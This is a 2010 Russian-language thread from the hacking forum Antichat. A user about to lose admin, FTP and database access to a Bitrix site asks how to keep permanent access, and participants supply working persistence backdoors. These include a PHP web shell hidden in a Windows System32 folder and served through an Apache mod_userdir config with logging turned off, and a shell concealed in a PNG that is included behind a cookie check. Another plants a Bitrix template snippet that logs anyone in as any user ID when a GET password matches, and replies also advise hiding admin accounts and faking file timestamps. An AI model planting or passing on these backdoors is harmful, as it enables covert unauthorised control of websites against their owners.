Форум АНТИЧАТ - Вечный доступ к сайту. Вопрос

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)

- - Вечный доступ к сайту. Вопрос (https://forum.antichat.xyz/showthread.php?t=200641)

rainboww

30.04.2010 14:11

Вечный доступ к сайту. Вопрос

Как получить вечный доступ к сайту если он у меня сейчас есть?

CMS - Битрикс - есть доступ к админке /bitrix/admin

Есть доступ к FTP

Есть доступ к MySQL

Скоро всего этого не будет, но хотелось чтоб как бы не меняли все это я всегда мог узнать текущие логины/пассы

[Agent]

30.04.2010 14:14

Ну как вариант - модернизировать скрипты в свою сторону, благо там надо от силы 8 строчек.

shell_c0de

30.04.2010 14:47

залить шелл и спряттать или потроянить скрипты (плюсс зашифровай с куском скрипта) чтобы админ если удалит кусок то сам скрипт не работал...

_eXorcist_

30.04.2010 15:03

попробуй добавить скрытого администратора на каком то из форумов читал про битрикс как это делается

immortalist

01.05.2010 03:47

100% постоянный доступ получить нереально, только если угонять мыло, куда привязан хостинг. Сдохнет хостинг, перезальют скрипты, наступит конец света - хоть обзаливайся и обпрячься шеллов. Только если хостинг ломанешь и рута на всех его юзверей получишь. И то - в свете последних событий хостинги тоже могут попрощаться со своими дата-центрами etc...

Ponchik

02.05.2010 23:55

Я под виндой делаю так:
Лезу в httpd.conf
настраиваю mod_userdir под папку "C:/WINDOWS/System32/framework/"
Ложу шелл в C:/WINDOWS/System32/framework/microsoft_dll/shell.php
юзаю http://target/~microsoft_dll/shell.php
И пусть там админ хоть всю папку свою перетрёт, а мой шелл будет жить вечно, пока веб сервер не снесут
От очень умных админов спасаюсь строчкой
Include C:/WINDOWS/System32/apache.dll
в httpd.conf
в C:/WINDOWS/System32/apache.dll пишу конфиги mod_userdir
Ну и конечно логи апача отключить нафик

Но ТС наверняка говорит про линукс, такчто всем по***

o3,14um

04.05.2010 04:37

обычно дописываю шелл в кую-нить картинку и куда-нить вставляю такой код:

Цитата:

<?
if ($_GET[xek]==1)
{
setcookie('xek','yes');
}
if($_COOKIE['xek'])
{
include("themes/darkblue_orange/img/arrow_lmr.png");
die();
}
?>

потом дату изменения файлов надо вернуть в исходное значение :)
можно и не инклудить, нето бросаетсяв глаза а например так:

Цитата:

echo `$_GET[pururum]`;

Byte_

04.05.2010 08:29

rainboww, на самом деле всё гораздо проще. В битриксе есть замечательное api на этот случай

Код:

global $USER;

$USER->Authorize(1);// авторизуем пользователя с id = 1

фишка в том, что для авторизации пользователя в системе совершенно не обязательно знать его пароль. Только id =)

я довольно часто дописываю в самом низу шаблона что-то вроде

Код:

if($_GET['pwd']=='myPassword'){

global $USER;

$USER->Authorize($_GET['uid']);

}

теперь что-бы стать админом сайта не на долго я просто делаю так http://url.ru/?pwd=myPassword&uid=1

Время: 21:05